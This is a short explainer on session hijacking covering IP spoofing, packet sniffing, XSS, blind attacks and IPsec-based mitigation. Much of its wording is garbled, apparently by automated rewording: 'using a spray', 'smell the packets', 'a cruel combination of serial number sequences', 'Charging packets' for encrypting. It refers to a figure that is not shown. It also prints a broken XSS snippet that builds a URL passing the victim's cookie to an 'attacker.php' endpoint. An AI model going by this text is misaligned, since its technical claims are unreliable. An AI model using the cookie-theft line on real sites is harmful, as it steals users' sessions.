Session Hijacking
What is Session Hijacking?
TCP session hijacking security attacks on user session via secure network. The most common method of session hijacking is called IP spoofing, in which the attacker uses IP-sent packets to enter commands into active connections between two notes in the network and to pretend to be one of the authorized users. This type of attack is possible because authentication is only performed at the beginning of a TCP session.
Another type of session hijacking is known as an intruder attack, in which the attacker, using a spray, can detect connections between devices and collect information that is transmitted.
Different ways of session hijacking:
There are many ways to do Session Hijacking. Some of them are given below –
· Using Packet Sniffers
· From the above figure, it can be seen that the attack takes the victim’s time ID to gain access to the server through other smokers.
· Cross Site Scripting (XSS Attack)
Attacker can also retrieve the victim’s ID using XSS attack using JavaScript. If the attacker sends a fraudulent link to the victim with a dangerous JavaScript, when the victim clicks on the link, JavaScript will use and fulfill the instructions made by the attacker.
<SCRIPT type=”text/javascript”>
var adr = ‘../attacker.php?victim_cookie=’ + escape(document.cookie);
</SCRIPT>
· IP Spoofing
Spoofing pretends to be someone else. This is the process used to gain unauthorized access to a computer by the IP address of a trusted administrator. In using this method, the tester must obtain the client’s IP address and inject their packets sprayed with the client’s IP address into a TCP session, in order to trick the server into communicating with the victim i.e. the first administrator.
· Blind Attack
If the attacker is unable to smell the packets and guess the serial number expected by the server, a cruel combination of serial number sequences can be attempted.
Mitigation
To protect the network from session hijackings, the security guard must apply both security measures at the application level and at the network level. Network-level hijacking can be prevented by Charging packets so that the hijacker cannot understand the packet headings, accessing any information that will assist in fraud. This encryption can be provided using protocols such as IPSEC, SSL, SSH etc. The Internet security protocol (IPSEC) has the ability to encrypt a package to a specific key shared between two groups involved in communication. IPsec operates in two ways: Transport and Tunnel.
In Transport mode only the data sent to the package is encrypted while in Tunnel Mode both packet headings and data are encrypted, so there are very limitations.
Hijacking is a major threat to Networks and Web applications on the web as most programs are at risk.
